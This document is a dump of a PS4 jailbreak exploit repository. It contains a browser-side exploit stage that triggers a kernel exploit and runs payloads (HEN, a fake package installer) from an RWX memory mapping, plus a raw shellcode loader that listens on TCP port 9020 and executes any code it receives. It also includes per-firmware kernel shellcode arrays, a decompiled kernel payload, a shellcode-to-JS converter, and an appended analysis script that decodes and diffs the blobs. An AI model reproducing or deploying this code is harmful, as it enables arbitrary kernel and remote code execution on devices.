573 | 		var req = new XMLHttpRequest();
574 | 		req.open('GET', path);
575 | 		req.responseType = "arraybuffer";
576 | 		req.send();
577 | 		req.onreadystatechange = function () {
578 | 			if (req.readyState === 4) {
579 | 				try {
580 | 					var code_addr = new int64(0x26100000, 0x00000009); // 0x926100000
581 | 					var mapped_address = p.syscall("sys_mmap", code_addr, 0x300000, 7, 0x41000, -1, 0); // 3 MiB RWX anonymous mapping at a fixed address
582 | 					if (mapped_address != '926100000')
583 | 						throw "sys_mmap failed";
584 | 					var shellcode = new Uint32Array(req.response);
585 | 					for (var i=0; i < shellcode.length; i++)
586 | 						p.write4(code_addr.add32(0x100000 + i * 4), shellcode[i]); // payload bytes land at 0x926200000
587 | 					p.fcall(code_addr.add32(0x100000)); // enter at the payload's first byte; the mapping base only holds the zero-filled prefix
588 | 					// Free memory
589 | 					for (var i = 0; i < 0x300000; i += 8)
590 | 						p.write8(code_addr.add32(i), 0);
591 | 				} catch (e) {
592 | 					alert("exception: " + e);
593 | 				}
594 | 			}
595 | 		}
596 | 	}
597 | 	
598 | 	//alert("Launching kexploit");
599 | 	
600 | 	// Test if the kernel is already patched
601 | 	if (p.syscall("sys_setuid", 0) != '0')
602 | 		while (!kernExploit()) {}
603 | 	// Kernel patched, launch cool stuff
604 | 	
605 | 	// Check mira status
606 | 	var testMira = p.syscall("sys_setlogin", p.stringify("root"));
607 | 	if (fwFromUA == "5.05") {
608 | 		//runPayload("kdumper.bin");
609 | 		runPayload("ps4-hen-vtx-505.bin");
610 | 		//runPayload("unblocker.bin");
611 | 		
612 | 		/*
613 | 		sleep(2000);
614 | 		runPayload("mira_505.bin");
615 | 		sleep(2000);
616 | 		// Test if payloads ran successfully, if not, refresh
617 | 		testMira = p.syscall("sys_setlogin", p.stringify("root"));
618 | 		if (testMira != '0') {
619 | 			alert("Mira failed to run !");
620 | 			//location.reload();
621 | 		}
622 | 		*/
623 | 		
624 | 		// All done all done!
625 | 		allset();
626 | 	} else if (fwFromUA == "4.74") {
627 | 		//runPayload("kdumper.bin");
628 | 		runPayload("fake_installer.bin");
629 | 		
630 | 		// All done all done!
631 | 		allset();
632 | 	} else if (fwFromUA == "4.55") {
633 | 		runPayload("ps4-hen-vtx-455.bin");
634 | 		//runPayload("unblocker.bin");
635 | 		
636 | 		// All done all done!
637 | 		allset();
638 | 	} else {
639 | 		// Load payload launcher: the shellcode below (socket/bind/listen/accept) waits on TCP port 9020 (0x233c), copies whatever it receives to 0x926200000 and calls it
640 | 		var code_addr = new int64(0x26100000, 0x00000009);
641 | 		var mapped_address = p.syscall("sys_mmap", code_addr, 0x300000, 7, 0x41000, -1, 0);
642 | 		if (mapped_address == '926100000') {
643 | 			try {
644 | 				var shcode = [0x31fe8948, 0x3d8b48c0, 0x00003ff4, 0xed0d8b48, 0x4800003f, 0xaaf3f929, 0xe8f78948, 0x00000060, 0x48c3c031, 0x0003c0c7, 0x89490000, 0xc3050fca, 0x06c0c748, 0x49000000, 0x050fca89, 0xc0c748c3, 0x0000001e, 0x0fca8949, 0xc748c305, 0x000061c0, 0xca894900, 0x48c3050f, 0x0068c0c7, 0x89490000, 0xc3050fca, 0x6ac0c748, 0x49000000, 0x050fca89, 0x909090c3, 0x90909090, 0x90909090, 0x90909090, 0xb8555441, 0x00003c23, 0xbed23153, 0x00000001, 0x000002bf, 0xec834800, 0x2404c610, 0x2444c610, 0x44c70201, 0x00000424, 0x89660000, 0xc6022444, 0x00082444, 0x092444c6, 0x2444c600, 0x44c6000a, 0xc6000b24, 0x000c2444, 0x0d2444c6, 0xff78e800, 0x10baffff, 0x41000000, 0x8948c489, 0xe8c789e6, 0xffffff73, 0x00000abe, 0xe7894400, 0xffff73e8, 0x31d231ff, 0xe78944f6, 0xffff40e8, 0x48c589ff, 0x200000b8, 0x00000926, 0xc300c600, 0xebc38948, 0x801f0f0c, 0x00000000, 0x01489848, 0x1000bac3, 0x89480000, 0xe8ef89de, 0xfffffef7, 0xe87fc085, 0xe8e78944, 0xfffffef8, 0xf1e8ef89, 0x48fffffe, 0x200000b8, 0x00000926, 0x48d0ff00, 0x5b10c483, 0xc35c415d, 0xc3c3c3c3];
645 | 				var shellbuf = p.malloc32(0x1000);
646 | 				for (var i = 0; i < shcode.length; i++)
647 | 					shellbuf.backing[i] = shcode[i];
648 | 				p.syscall("sys_mprotect", shellbuf, 0x4000, 7);
649 | 				// Launch loader
650 | 				p.fcall(window.gadgets["createThread"], shellbuf, 0, p.stringify("loader"));
651 | 			} catch (e) { alert(e); }
652 | 		}
653 | 		
654 | 		// Awaiting payload message
655 | 		awaitpl();
656 | 	}
657 | }


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # PS4-Exploits
 2 | Everything you need to exploit your PS4 on almost all firmware versions below 5.07
 3 | 
 4 | ## QuickHEN
 5 | An all-in-one playground for PS4 on 4.55-5.07.
 6 | 
 7 | ### Description
 8 | 
 9 | Supports 4.55, 4.74, 5.01, 5.05 and 5.07.
10 | 
11 | ### Usage
12 | 
13 | Host these files on a server and access index.html on a PS4.
14 | 
15 | ### Credits
16 | 
17 | * qwertyoruiopz
18 | * Specter
19 | * CelesteBlue
20 | * to be continued
21 | 


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode2js/bin/shellcode2js.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/shellcode_ps4_bpf_505_kexploit/shellcode2js/bin/shellcode2js.exe


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode2js/src/Makefile:
--------------------------------------------------------------------------------
 1 | CC=gcc
 2 | CFLAGS=
 3 | LDFLAGS=
 4 | SOURCES=main.c
 5 | EXECUTABLE=shellcode2js
 6 | 
 7 | all:
 8 | 	$(CC) $(CFLAGS) $(SOURCES) $(LDFLAGS) -o $(EXECUTABLE)
 9 | 	
10 | clean:
11 | 	rm -rf $(EXECUTABLE)


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode2js/src/main.c:
--------------------------------------------------------------------------------
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* shellcode2js: dump a raw shellcode .bin as a JavaScript "var shcode = [...]"
 * array, one 32-bit word per "0x%08X" literal. Words are read in host byte
 * order, i.e. little-endian on x86, which is what the JS side writes back
 * into its buffer. */
int main(int argc, char** argv) {
	FILE *input = NULL, *output = NULL;
	char outpath[256];

	/* Usage: shellcode2js <input.bin> [output.js]; default output is <input.bin>.js */
	if (argc == 2)
		snprintf(outpath, sizeof(outpath), "%s.js", argv[1]);
	else if (argc == 3)
		snprintf(outpath, sizeof(outpath), "%s", argv[2]);
	else {
		fprintf(stderr, "usage: %s <input.bin> [output.js]\n", argv[0]);
		return 1;
	}

	input = fopen(argv[1], "rb");
	output = fopen(outpath, "wb");
	if (!input || !output) {
		/* The original only printed here and went on to use the NULL handle. */
		fprintf(stderr, "could not open file\n");
		return 1;
	}

	fseek(input, 0, SEEK_END);
	long size = ftell(input);
	fseek(input, 0, SEEK_SET);
	if (size <= 0) {
		fprintf(stderr, "empty input or ftell failed\n");
		return 1;
	}

	uint32_t* buffer = (uint32_t *)malloc((size_t)size);
	if (!buffer) {
		fprintf(stderr, "out of memory\n");
		return 1;
	}
	if (fread(buffer, 1, (size_t)size, input) != (size_t)size) {
		fprintf(stderr, "short read\n");
		return 1;
	}
	fclose(input);

	/* Only whole words are emitted; say so instead of dropping bytes silently. */
	if (size % 4)
		fprintf(stderr, "warning: %ld trailing byte(s) not a full word, dropped\n", size % 4);

	fputs("    var shcode = [", output);
	for (size_t i = 0; i < (size_t)size / 4; i++)
		fprintf(output, "0x%08" PRIX32 ", ", buffer[i]);
	fputs("];\n", output);

	free(buffer);
	fclose(output);
	return 0;
}


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_455.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/shellcode_ps4_bpf_505_kexploit/shellcode_455.bin


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_455.bin.js:
--------------------------------------------------------------------------------
1 |     var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x6A302494, 0x8D4DFFCF, 0xE18024B4, 0x8D4D000E, 0xE96024AC, 0x8149FFD0, 0x65A680C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, ];
2 | 


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_474.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/shellcode_ps4_bpf_505_kexploit/shellcode_474.bin


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_474.bin.js:
--------------------------------------------------------------------------------
1 |     var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x48302494, 0x8D4DFFCF, 0xCDF024B4, 0x8D4D000E, 0xC76024AC, 0x8149FFD0, 0x660570C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, ];
2 | 


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_501.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/shellcode_ps4_bpf_505_kexploit/shellcode_501.bin


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_501.bin.js:
--------------------------------------------------------------------------------
1 |     var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xDF8024B4, 0x8D4D0010, 0x5AB024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, ];
2 | 


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_505.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/shellcode_ps4_bpf_505_kexploit/shellcode_505.bin


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_505.bin.js:
--------------------------------------------------------------------------------
1 |     var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xE09024B4, 0x8D4D0010, 0x5E8024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, ];
2 | 


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_505.c:
--------------------------------------------------------------------------------
/* This file has been generated by the Hex-Rays decompiler.
   Copyright (c) 2007-2017 Hex-Rays 

   Detected compiler: GNU C++
*/

#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

__int64 j_sycall_11_sub();
__int64 kpayload();
signed __int64 syscall_11_sub();

//-------------------------------------------------------------------------
// Data declarations

char *aKmalloc0x016lx[] = { (char *)0x3A636F6C6C616D6BLL, (char *)0x6C36313025783020LL };
__int64 qword_D0 = 0LL; // weak


//----- (0000000000000010) ----------------------------------------------------
__int64 kpayload()
{
  signed __int64 v0; // rcx
  signed int i; // ebx
  unsigned __int64 xfast_syscall; // r12
  signed __int64 kbase; // rdx
  __int64 (__fastcall *malloc)(unsigned __int64, __int64, unsigned int); // r14
  __int64 (__fastcall *printf)(__int64, __int64, __int64, __int64, __int64, __int64, char); // r13
  signed __int64 M_KQUEUE_offset; // r12
  __int64 malloc_res; // rsi

  v0 = 0xC0000082LL;
  i = 0x100;
  xfast_syscall = __readmsr(0xC0000082);
  kbase = xfast_syscall - 0x1C0;
  malloc = (__int64 (__fastcall *)(unsigned __int64, __int64, unsigned int))(xfast_syscall + 0x10E090);
  printf = (__int64 (__fastcall *)(__int64, __int64, __int64, __int64, __int64, __int64, char))(xfast_syscall + 0x435E80);
  M_KQUEUE_offset = xfast_syscall + 0x14B7160;
  qword_D0 = kbase;
  do
  {
    malloc_res = ((__int64 (__fastcall *)(signed __int64, signed __int64, signed __int64, signed __int64))malloc)(
                   0x800LL,
                   M_KQUEUE_offset,
                   2LL,
                   v0);
    ((void (__fastcall *)(char **, __int64))printf)(aKmalloc0x016lx, malloc_res);
    --i;
  }
  while ( i );
  return 0LL;
}
// D0: using guessed type __int64 qword_D0;

//----- (0000000000000090) ----------------------------------------------------
signed __int64 syscall_11_sub()
{
  signed __int64 result; // rax

  result = 11LL;
  __asm { syscall; Low latency system call }
  return result;
}

// ALL OK, 2 function(s) have been successfully decompiled

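The shellcode_*.bin.js arrays above are what shellcode2js emits (one `0x%08X` literal per 32-bit word of the .bin), and the decompiled shellcode_505.c shows which constants in that code are firmware-specific: the kbase delta and the malloc, printf and M_KQUEUE offsets, all taken relative to the LSTAR MSR value. The JavaScript below is an added analysis example and is not part of the TeamFAPS repository. It reverses the shellcode2js encoding, runs a minimal `strings` pass over the bytes (which recovers the `kmalloc: 0x%016lX` format string the payload prints with), and diffs the 4.55 and 4.74 arrays word by word to locate the words that were patched between the two builds. The two word arrays are copied verbatim from shellcode_455.bin.js and shellcode_474.bin.js; every function name is my own.

```javascript
// Added example, not part of the TeamFAPS repository: decode shellcode2js
// output back into bytes, extract printable strings, and diff two firmware
// variants to find the patched (firmware-specific) words.

// Word arrays copied verbatim from shellcode_455.bin.js and shellcode_474.bin.js.
const SHCODE_455 = [
  0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155,
  0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x6A302494,
  0x8D4DFFCF, 0xE18024B4, 0x8D4D000E, 0xE96024AC, 0x8149FFD0, 0x65A680C4, 0x10894801, 0x00401F0F,
  0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41,
  0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5,
  0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130,
  0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
  0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
];
const SHCODE_474 = [
  0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155,
  0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x48302494,
  0x8D4DFFCF, 0xCDF024B4, 0x8D4D000E, 0xC76024AC, 0x8149FFD0, 0x660570C4, 0x10894801, 0x00401F0F,
  0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41,
  0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5,
  0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130,
  0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
  0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
];

// Parse a "var shcode = [...]" line as written by shellcode2js into 32-bit words.
// Only 0x-prefixed hex literals are accepted; the trailing ", ]" is tolerated.
function parseShcodeLine(line) {
  const m = /var\s+shcode\s*=\s*\[([^\]]*)\]/.exec(line);
  if (!m) throw new Error('no shcode array in input');
  return m[1].split(',').map((s) => s.trim()).filter((s) => s.length > 0).map((s) => {
    if (!/^0x[0-9A-Fa-f]{1,8}$/.test(s)) throw new Error('bad literal: ' + s);
    return parseInt(s, 16) >>> 0;
  });
}

// Inverse of shellcode2js: each word is four little-endian bytes (the C tool
// reads the .bin as host-order uint32_t on x86).
function wordsToBytes(words) {
  const out = new Uint8Array(words.length * 4);
  words.forEach((w, i) => {
    out[4 * i] = w & 0xff;
    out[4 * i + 1] = (w >>> 8) & 0xff;
    out[4 * i + 2] = (w >>> 16) & 0xff;
    out[4 * i + 3] = (w >>> 24) & 0xff;
  });
  return out;
}

// Same output format as shellcode2js ("0x%08X, " per word). A length that is
// not a multiple of four is rejected instead of silently truncated.
function bytesToShcodeLine(bytes) {
  if (bytes.length % 4 !== 0) throw new Error('length not a multiple of 4');
  let s = '    var shcode = [';
  for (let i = 0; i < bytes.length; i += 4) {
    const w = (bytes[i] | (bytes[i + 1] << 8) | (bytes[i + 2] << 16) | (bytes[i + 3] << 24)) >>> 0;
    s += '0x' + w.toString(16).toUpperCase().padStart(8, '0') + ', ';
  }
  return s + '];\n';
}

// Minimal `strings`: runs of at least minLen printable ASCII bytes.
function extractStrings(bytes, minLen = 4) {
  const found = [];
  let run = '';
  for (const b of bytes) {
    if (b >= 0x20 && b <= 0x7e) { run += String.fromCharCode(b); continue; }
    if (run.length >= minLen) found.push(run);
    run = '';
  }
  if (run.length >= minLen) found.push(run);
  return found;
}

// Word-by-word diff of two variants. The indices that differ are where one
// build carries different immediates (firmware-specific offsets).
function diffWords(a, b) {
  const diffs = [];
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    if (a[i] !== b[i]) diffs.push({ index: i, byteOffset: 4 * i, a: a[i], b: b[i] });
  }
  return diffs;
}

const hex8 = (w) => '0x' + w.toString(16).toUpperCase().padStart(8, '0');
console.log('4.55 strings:', extractStrings(wordsToBytes(SHCODE_455)));
for (const d of diffWords(SHCODE_455, SHCODE_474)) {
  console.log(`word ${d.index} (byte 0x${d.byteOffset.toString(16)}): 4.55=${hex8(d.a)} 4.74=${hex8(d.b)}`);
}
```

Running it under node reports words 15, 17, 19 and 21 as the only differences between the 4.55 and 4.74 blobs; in the 5.05 array those same positions hold the immediates that the decompiled kpayload shows as `- 0x1C0` (kbase), `+ 0x10E090` (malloc), `+ 0x435E80` (printf) and `+ 0x14B7160` (M_KQUEUE), which is how one confirms that the per-firmware builds differ only in those offsets. `bytesToShcodeLine(wordsToBytes(words))` reproduces the .bin.js line byte for byte, so the pair can be used to check a .bin against its checked-in .js array.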


--------------------------------------------------------------------------------
/shellcode_ps4_bpf_505_kexploit/shellcode_505.i64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/shellcode_ps4_bpf_505_kexploit/shellcode_505.i64


--------------------------------------------------------------------------------